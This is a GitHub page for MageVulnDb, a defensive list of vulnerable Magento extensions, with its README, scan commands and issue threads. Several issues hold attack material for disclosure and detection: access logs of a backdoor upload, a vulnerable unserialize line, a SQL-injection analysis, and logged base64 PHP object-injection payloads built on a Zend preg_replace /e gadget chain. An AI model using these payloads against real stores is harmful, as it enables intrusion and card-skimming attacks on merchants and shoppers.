List of Magento extensions with known security issues.

Overview

Magento Vulnerability Database

List of Magento 1 and 2 integrations with known security issues. Objective: easily identify insecure 3rd party software in your Magento code base. See our blog for the rationale: Bad extensions now main source of Magento hacks & a solution

n98-magerun dev:module:security

Magento 1 list / Magento 2 list

The list contains these columns:

  1. Vendor_Name of the module
    • Reported under M1 using n98-magerun dev:module:list or Mage::getConfig()->getNode()->modules
    • Reported under M2 using bin/magento module:status
  2. The earliest safe version to use. Older entries are considered insecure.
  3. Part of the URL that attackers use to exploit this module. Can be used to search logfiles for malicious activity. (optional)
  4. Reference URL describing the problem. If no public statement is available, then the name of the researcher who discovered it.
  5. URL with upgrade instructions (optional)

Context

Magento is an attractive target for payment skimmers and the number of attacks has increased steadily since 2015. In 2018, attackers shifted from Magento core exploits (eg, Shoplift, brute force attacks on admin passwords) to 3rd party software components. This poses a practical problem: there is no central place where one can (programmatically) find out whether a particular module version has known security issues. This repository solves that!

Usage

You can quickly scan your site against this repository using a Magerun module or a single-line command. Both require command line or SSH access to the server. Magerun is recommended as it can be easily scheduled or used on an ongoing basis, and provides better output. Both approaches load the latest vulnerability data on every run.

Magerun module (recommended)

  1. Install n98-magerun for Magento 1 or Magento 2.
  2. Install the Magento Vulnerability Database plugin: For Magento 1:
mkdir -p ~/.n98-magerun/modules
cd ~/.n98-magerun/modules
git clone https://github.com/gwillem/magevulndb.git

For Magento 2:

mkdir -p ~/.n98-magerun2/modules
cd ~/.n98-magerun2/modules
git clone https://github.com/gwillem/magevulndb.git
  1. Scan your Magento install:
n98-magerun.phar dev:module:security

You can also use the -q flag to limit output to findings only.

n98-magerun.phar dev:module:security -q

You can check the exit code, for example to fail a build when a vulnerable module is detected:

  • exit code 0: no known vulnerabilities found
  • exit code 1: known vulnerabilities found
  • exit code 2: vulnerability data could not be loaded

No magerun installed under Magento 1?

To quickly check a Magento installation for vulnerable modules, run this command in SSH at your Magento 1 site root:

php -r 'require_once("app/Mage.php");Mage::app();$config=Mage::getConfig()->getNode()->modules;$found=array();$list=fopen("https://raw.githubusercontent.com/gwillem/magevulndb/master/magento1-vulnerable-extensions.csv","r");while($list&&list($name,$version)=list($row["module"],$row["fixed_in"],,$row["reference"],$row["update"])=fgetcsv($list)){if(isset($name,$version,$config->{$name},$config->{$name}->version)&&(empty($version)||version_compare($config->{$name}->version,$version,"<"))){$found[]=$row;}}if($found){echo "Found possible vulnerable modules: ".print_r($found,1);}else{echo "No known vulnerable modules detected.";}'

You can check the exit code, for example to fail a build when a vulnerable module is detected:

  • exit code 0: no known vulnerabilities found
  • exit code 1: known vulnerabilities found

This script only works under Magento 1. For Magento 2, use Magerun instead.

Contributing

Contributions welcome. Requirements:

  • Either "name" or "uri" (in case of exploitation in the wild) is required.
  • A reputable, verifiable source is required.
  • In case of admin URL disclosure: the issue is not fixed by disabling the security compatibility mode

Only security issues that have verified proof or are being actively exploited in the wild should be considered.

Please consider responsible disclosure before submitting zero-day vulnerabilities. If no immediate abuse is likely, please notify the vendor first and allow 30 days for a patch & release statement.

FAQ

Why a new repository?

There are many good initiatives already, however they either lack a simple web GUI, are too complicated to maintain or do not cover all extensions out there. For Magento 2, there is already excellent support via composer, please refer to Roave's SecurityAdvisories for automated composer integration. Still, Roave's approach requires you to run a composer command to check for new updates. With this Magerun command, you can leave the composer files untouched. Obviously, it also works on Magento 1 and 2 installs that are not managed by composer at all.

What if a module has multiple security issues over time?

We register the newest only and advice everybody to upgrade to the latest version. If people want to stick to an older (possible insecure) version, they should study the relevant changelogs.

What about modules that are known under several names?

The name as registered in the code (and output by n98-magerun dev:module:list) is leading. If a module is known under several (code) names, then we should create duplicate entries, so that automated tools will not ignore such an entry.

What if I don't know the module name?

If you have a URL that is being attacked but don't know what module it belongs to, submit it but leave the name "?". It will be backfilled when the actual module is identified.

There are multiple sources, which should I use?

If the vendor has issued a security statement, that should be leading. Otherwise, a statement by a security researcher (Blog/Twitter) can be used. If a vendor has issued a statement that is false or misleading, an independent statement should take precedence.

We could add more information X?

Indeed, but the main advantage of a simple CSV with few columns is that it's easy to browse, maintain and extend. Other projects have stalled because there is too much overhead in vulnerability administration. The primary objective of this repository is to support a n98-magerun command. If people want more information, they can look it up via the referenced source.

What is the Relevant URI column for?

This can be used by tools to filter "suspicious" web traffic from the logs, for example to check if malicious activity has already taken place. The URI should be enough to uniquely match the module's vulnerable URL(s), if possible.

What if there are multiple relevant URLs?

Seperate them with a ";"

What if a module does not have version numbers?

Use the date of the fix in YYYY-MM-DD notation.

What if the vendor provides a fix but does not update the version number?

Some Magento 1 modules, such as Mirasvit (discussion) do not use the standard version numbering, so vulnerable versions cannot be automatically detected. To eliminate false alarms, all such modules are prefixed with an underscore, so the automatic module parser will not recognize them. It is suboptimal but better than not storing information at all.

Acknowledgements

These Magento/security professionals have contributed valuable research and code:

  • Ryan Hoerr - ParadoxLabs
  • Peter O'Callaghan
  • Max Chadwick - Something Digital
  • Jeroen Vermeulen - MageHost.pro
  • Roland Walraven - MageHost.pro
  • Martin Pachol - MageMojo
  • Jisse Reitsma - Yireo
  • Niko Granö - Lamia.fi
  • Martien Mortiaux - AlterWeb.nl

License

The information and code of this repository is provided free of charge, without warranty or assumed liability of any kind. Merchants and development agencies are free to use this data to assess their own stores. It is not allowed to use or include this data in commercial products or offerings.

Contact

[email protected]

Comments
  • Mirasvit_Helpdesk vulnerable up to version 1.5.14

    Mirasvit_Helpdesk vulnerable up to version 1.5.14

    There was no security announcement, but Mirasvit_Helpdesk has a "possible XSS security issue" up to 1.5.14: https://mirasvit.com/doc/extension_helpdesk/current/changelog

    Note that MageVulnDb may report an older version for Mirasvit_Helpdesk than you actually have installed because a new marketing version might not trigger a change in config.xml. For example, marketing version 1.5.11 has the XML config entry <version>1.0.36</version>.

    I will update this issue when I know if 1.5.14 has a newer XML config version.

    opened by mzeis 10
  • Add BL_CustomGrid

    Add BL_CustomGrid

    See https://xn--gran-8qa.fi/magento-1-bl-customgrid-security-flaw/ for reference. Will be providing later update url for fixed version. (I will fork this and provide update.)

    Closes #28

    opened by NikoGrano 9
  • Many Amasty vulnerabilities

    Many Amasty vulnerabilities

    Search Amasty site for security changelogs, there are MANY:

    https://www.google.nl/search?q="security+issues"+site:amasty.com

    I've included a few in this PR. However, I have guessed the internal name from these pages. Help welcome in validating / adding the others.

    opened by gwillem 9
  • n98-magerun module?

    n98-magerun module?

    @rhoerr used this for his JSON files, we'll only need to parse CSV files and turn it into a magerun plugin.

    <?php
    require_once("app/Mage.php");
    Mage::app();
    
    $c = Mage::getConfig()->getNode()->modules;
    $v = json_decode(file_get_contents("https://something.example.com/magento-vuln-extensions/m1-list.json"),1);
    $f = array();
    foreach ($v as $m) {
    	if (isset($c->{$m["module"]}, $c->{$m["module"]}->version)) {
    		$i = $c->{$m["module"]}->version;
    		if ((empty($m["fixed_in"]) || version_compare($i, $m["fixed_in"], "<"))
    			&& (empty($m["version_from"]) || version_compare($i, $m["version_from"], ">="))) {
    			$f[] = $m;
    		}
    	}
    }
    
    if ($f) {
    	echo "Found potentially vulnerable modules: ".print_r($f,1);
    } else {
    	echo "No known vulnerable modules detected.\n";
    }
    
    opened by gwillem 8
  • Add Mageplaza Layered Navigation XSS Vulnerability

    Add Mageplaza Layered Navigation XSS Vulnerability

    As per: https://www.mageplaza.com/releases/layered-navigation/

    Do we have a way to split module versions? Mageplaza are currently maintaining a Magento 2.3 and a Magento 2.4 version of this module which have different release lines e.g. 2.3 = 2.x, 2.4 = 4.x

    I've added both versions in this PR but appreciate this will likely cause issues e.g. a person on Magento 2.3 with v2.5.2 of Layered Navigation will probably get an alert to upgrade to 4.1.2 despite already having the XSS patch applied.

    opened by itmsenior 7
  • Need PoC for Sendinblue Magento1 vulnerability

    Need PoC for Sendinblue Magento1 vulnerability

    Observed attack placing backdoor via /sendinblue/ajax/ajaxupdate/. Version of plugin: 1.1.9 No direct RCE (eval/unserialize) was found in plugin's code. Perhaps the plugin acts as gateway to a M1 vuln?

    {"time":"2022-07-18T13:29:40+00:00", "remote_addr":"217.170.207.111", "remote_user":"", "host":"REDACTED", "request":"POST /sendinblue/ajax/ajaxupdate/ HTTP/1.1", "status":"200", "body_bytes_sent":"31", "referer":"", "user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", "request_time":"0.463", "handler":"phpfpm", "country":"NO", "port":"443", "ssl_cipher":"TLS_AES_256_GCM_SHA384", "ssl_protocol":"TLSv1.3"}
    
    {"time":"2022-07-18T13:29:40+00:00", "remote_addr":"217.170.207.111", "remote_user":"", "host":"REDACTED", "request":"GET /api_1.php HTTP/1.1", "status":"200", "body_bytes_sent":"37", "referer":"", "user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", "request_time":"0.002", "handler":"phpfpm", "country":"NO", "port":"443", "ssl_cipher":"TLS_AES_256_GCM_SHA384", "ssl_protocol":"TLSv1.3"}
    
    opened by jspanjerberg 5
  • Blacklist Bss_MultiWishlist (CWE-79)

    Blacklist Bss_MultiWishlist (CWE-79)

    More information can be found at https://xn--gran-8qa.fi/bss-multiwishlist-xss-injection/ after given 3 days to vendor has passed. I have provided them also a fix for this issue, so it's just a matter of releasing a patching version. Fixing version will be added, when known is available.

    I'm requesting this to be added on the list.

    Reference for BSS: 17573.

    opened by NikoGrano 5
  • Amasty_PAction Maybe CWE-89?

    Amasty_PAction Maybe CWE-89?

    I'm honestly lost with this and because of that I'm requesting help. Please review this and tell your toughs. I'm kinda needing another eye pair to take a look. (I can share module code privately for inspection if requested.)

    So, possible CWE-89 here. image

    This code looks quickly looked like there is a for sure injection. However, first parameter for sprintf and second are safe, due those are not user input. However, there is this third parameter is taken from the request.

    // Amasty_Paction_Adminhtml_AmpactionController
    public function doAction()
        {
            $productIds  = $this->getRequest()->getParam('product');  // Please notice this.
            $val         = $this->getRequest()->getParam('ampaction_value');
            $dateFrom    = $this->getRequest()->getParam('ampaction_from');
            $dateTo      = $this->getRequest()->getParam('ampaction_to');
            $commandType = trim($this->getRequest()->getParam('command'));
            $storeId     = (int)$this->getRequest()->getParam('store', 0);
            $enhanced    = $this->getRequest()->getParam('enhanced', 0);
            
            if (Mage::getSingleton('admin/session')->isAllowed('catalog/products/mass_product_actions/' . $commandType)) {
                if (is_array($val)) {
                    $val = implode(',', $val);
                } elseif ('appendtext' !== $commandType) {
                    $val = trim($val);
                }
    
                try {
                    $command = Amasty_Paction_Model_Command_Abstract::factory($commandType, $dateFrom, $dateTo);
                    $success = $command->execute($productIds, $storeId, $val); // Vulnerable code is called here!
                    
                  
                    if ($success) {...}
                    foreach ($command->getErrors() as $err) {...}            
                } catch (Exception $e) {
                    ...
                }
            } else {
                $this->_getSession()->addError($this->__('Access denied.'));
            }
    
            if ($enhanced) {...} else {...}
    
            return $this;        
        }
    

    In above code, please notice lines 4 and 21. On line 4 we fetch product ids as array of ids. We pass this on line 21 to execute funtion.

    So, what happens in the function is the problematic thing. As said before first and second paramter is fine in sprintf function, but third one, well, we just implode this array to comma separated list without escaping or binding params! Let's see whole problematic script.

    // Amasty_Paction_Model_Command_Replacetext
    // Starting from line 82.
    if ($backendType == 'static') {
        $set = '';
        foreach ($attrIds as $attrId => $attrName) {
            $set .= sprintf(
                '`%s` = REPLACE(`%s`, %s, %s)', $attrName,
                $attrName, $db->quote($searchReplace['search']),
                $db->quote($searchReplace['replace'])
            );
        }
        $sql = sprintf('UPDATE %scatalog_product_entity
                      SET %s
                      WHERE entity_id IN(%s)
                        AND entity_type_id = %d',
            Mage::getConfig()->getTablePrefix(), $set, implode(',', $ids), // <==
            $entityTypeId
        );
    } else {
        $sql = sprintf('UPDATE %scatalog_product_entity_%s
                      SET `%s` = REPLACE(`%s`, %s, %s)
                      WHERE attribute_id IN (%s)
                        AND entity_id IN(%s)
                        AND entity_type_id = %d
                        AND store_id=%d',
            Mage::getConfig()->getTablePrefix(), $backendType, self::REPLACE_FIELD, self::REPLACE_FIELD,
            $db->quote($searchReplace['search']), $db->quote($searchReplace['replace']), // <==
            implode(',', array_keys($attrIds)), implode(',', $ids), // <==
            $entityTypeId, $storeId
        );
    }
    $db->query($sql);
    

    However. here I see %d is used instead of %s, which means that is not possible to inject. In other hand I saw following on php official site here.

    image

    So is my theory about having injection crushed and is quote safe to use, or should there be used binding. And yes, I would say there should be used binding params, but should the quote be classified as security flaw?

    opened by NikoGrano 5
  • Added AW_Autorelated - SQL injection

    Added AW_Autorelated - SQL injection

    I found a security issue in the AheadWorks Automatic Related Products module where you can inject SQL. I tested it on multiple Magento installations and multiple versions of this module (since 2.4.2 released at least 4.5 years ago) including the latest version (2.5.0).

    I reported this issue to AheadWorks. Once AheadWorks releases a patched version I will add it's version number and change the url for upgrade instructions.

    opened by AlterWeb 5
  • How to mark

    How to mark "Potential vulnerable module found" as safe?

    When magevulndb marks an extension as potentially unsafe:

    Potential vulnerable module found: Foo_Bar
    Matched by route: This may be a false positive where your installed module
    shares it with a vulnerable module, but it should be investigated further.
    Please contribute info about the module to MageVulnDb if it is relevant.
    

    And this is a false positive, and the module is project specific (i.e. there is value to add it to MageVulnDb), how can I mark the module as safe so that our build passes?

    opened by mzeis 4
  • Question: How to verify

    Question: How to verify "Potential vulnerable module" is vulnerable?

    I got

    Potential vulnerable module found: Glace_Freegift
    Matched by route: This may be a false positive where your installed module
    shares it with a vulnerable module, but it should be investigated further.
    Please contribute info about the module to MageVulnDb if it is relevant.
    Route:      freegift
    Looks Like: /freegift/cart/gurlgift/
    Module:     Glace_Freegift
    Installed:  0.2.1
    Credit:     https://gwillem.gitlab.io/2018/10/23/magecart-extension-0days/
    

    But how could I verify that this module is exactly the vulnerable module you expect to ?

    opened by kkrieger85 4
  • Multi branch version support

    Multi branch version support

    As discussed here. Some extensions release multiple branches, our data format currently doesn't support non-sequential security classification. https://github.com/sansecio/magevulndb/pull/92

    opened by gwillem 0
  • MW_FreeGift

    MW_FreeGift

    MW_FreeGift v3.3.3.7 for Magento 1 has a (most likely) unserialize vulnerability that is actually being exploited in the wild. I could not find a vendor provided changelog. The vendor also offers a version for Magento 2, its security status is unknown.

    // MW/FreeGift/controllers/CartController.php
    $params = unserialize(base64_decode($this->getRequest()->getPost('data')));
    
    opened by gwillem 3
  • Pixlogix_Flexibleforms

    Pixlogix_Flexibleforms

    FYI we found malicious PHP code in the media/flexibleforms/files/ on two separate installs, one running 2.0.1 (M2) and one running 0.5.0. Should look into the vuln and affected versions (cannot tell if 2.0.1 was compromised or an older version).

    Edit: we contacted the vendor last month but they did not reply

    opened by gwillem 4
  • Confirm Amasty M2 module tags

    Confirm Amasty M2 module tags

    Following #41:

    We need to confirm several module tags on the M2 list:

    • Amasty_Adminbookmarks
    • Amasty_GeoipRedirect
    • Amasty_Storeswitcher

    Case sensitive, must be exactly correct.

    opened by rhoerr 3
  • More POI probes

    More POI probes

    185.198.56.4 - [05/Jan/2019:16:44:21 +0000] "GET /customerconnect/rfqs/configureproduct/?options=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE0OiJleGl0KCJNeVR5SHkiKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIAKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0= HTTP/1.1" 403 2988 "" "" 185.198.56.4 - [06/Jan/2019:17:16:07 +0000] "GET /vendors/credit/withdraw/review/?data=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE0OiJleGl0KCJNeVR5SHkiKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIAKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0= HTTP/1.1" 403 2988 "" "" 109.237.138.20 - [06/Jan/2019:18:23:37 +0000] "GET /comm/returns/configureproduct/?options=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE0OiJleGl0KCJNeVR5SHkiKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIAKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0= HTTP/1.1" 403 2988 "" ""

    opened by gwillem 3
Owner
Sansec
Helping merchants stay ahead of hacks
Sansec
A curated list of resources for learning about application security

Awesome AppSec A curated list of resources for learning about application security. Contains books, websites, blog posts, and self-assessment quizzes.

Paragon Initiative Enterprises 5.4k Jan 7, 2023
A simple way to know if you are on the list of major security breaches like "HIBP", but it is specific for Iran.

Leakfa.com A simple way to know if you are on the list of major security breaches like "HIBP", but it is specific for Iran. Service content This produ

Leakfa 100 Nov 20, 2022
The Current US Version of PHP-Nuke Evolution Xtreme v3.0.1b-beta often known as Nuke-Evolution Xtreme. This is a hardened version of PHP-Nuke and is secure and safe. We are currently porting Xtreme over to PHP 8.0.3

2021 Nightly Builds Repository PHP-Nuke Evolution Xtreme Developers TheGhost - Ernest Allen Buffington (Lead Developer) SeaBeast08 - Sebastian Scott B

Ernest Buffington 7 Aug 28, 2022
SPAM Registration Stopper is a Q2A plugin that prevents highly probable SPAM user registrations based on well-known SPAM checking services and other techniques

SPAM Registration Stopper [by Gabriel Zanetti] Description SPAM Registration Stopper is a Question2Answer plugin that prevents highly probable SPAM us

Gabriel Zanetti 2 Jan 23, 2022
PHP Class Encoding featuring popular Encoding::toUTF8() function --formerly known as forceUTF8()-- that fixes mixed encoded strings.

forceutf8 PHP Class Encoding featuring popular \ForceUTF8\Encoding::toUTF8() function --formerly known as forceUTF8()-- that fixes mixed encoded strin

Sebastián Grignoli 1.6k Dec 22, 2022
Audit your PHP version for known CVEs and patches

PHP Version Audit PHP Version Audit is a convenience tool to easily check a given PHP version against a regularly updated list of CVE exploits, new re

Daniel 103 Dec 19, 2022
Modularize extensions using symlinks. Voted #1 Magento tool by @WebShopApps!

modman (Module Manager) Developing extensions for software that doesn't allow you to separate your files from core files, and keeping that extension u

Colin Mollenhour 731 Dec 29, 2022
A Magento 2 dashboard to display installed extensions. Read the blog post on some of the thinking behind it:

Extension Dashboard for Magento 2 This module adds a dashboard to review all installed extensions in the Magento admin (Magento 2.3.0+ for now only).

ExtDN 36 Dec 24, 2022
GitHub Actions for Magento 2 Extensions

GitHub Actions for Magento 2 Extensions This repository's aim is to provide a set of open sourced GitHub actions to write better tested Magento 2 exte

ExtDN 104 Jan 1, 2023
A htaccess boilerplate for all Magento Community installations. Features focus on speed, SEO and security.

magento-htaccess A htaccess boilerplate for all Magento Community installations. Features focus on speed, SEO and security. The file should be placed

Creare 114 Sep 18, 2022
A Magento community sourced security pre-flight checklist.

Magento Security Checklist This is a community sourced checklist of security measures to take before launching your store. Think of it as a pre-flight

Talesh Seeparsan 119 Oct 27, 2022
Issue tracking application extending GitHub's issues and pull requests for the Joomla! project.

Requirements The issue tracker application requires a server running: PHP 7.2 or 7.3 PHP's ext/curl and ext/intl should also be installed MySQL 5.5.3

Joomla! 68 Oct 27, 2022
A tool to automatically fix Twig Coding Standards issues

Twig CS Fixer Installation This standard can be installed with the Composer dependency manager. Add the coding standard as a dependency of your projec

Vincent Langlet 50 Jan 6, 2023
A Kimai 2 plugin, which send duration of cards to GitLab spend issues of timesheet.

GitLabBundle A Kimai 2 plugin, which send duration of cards to GitLab spend issues of timesheet. Installation First clone it to your Kimai installatio

LibreCode coop 9 Nov 14, 2022
Plugin to diagnose/fix ClassicPress SSL issues.

ClassicPress SSL Fix This plugin provides a way to work around the issue "cURL error 60: SSL certificate problem: certificate has expired" in ClassicP

ClassicPress Research 2 Oct 10, 2021
Analyzer of PHP code to search issues with deprecated functionality in newer interpreter versions.

PhpDeprecationDetector PhpDeprecationDetector - analyzer of PHP code to search usages of deprecated functionality in newer interpreter versions - depr

Sergey 312 Dec 26, 2022
Fixes WordPress 5.9 global CSS styles specificity issues

Fixes WordPress 5.9 global CSS styles specificity issues

Oliver Juhas 3 Feb 22, 2022
Analyzer of PHP code to search issues with deprecated functionality in newer interpreter versions.

PhpDeprecationDetector PhpDeprecationDetector - analyzer of PHP code to search usages of deprecated functionality in newer interpreter versions - depr

Sergey 312 Dec 26, 2022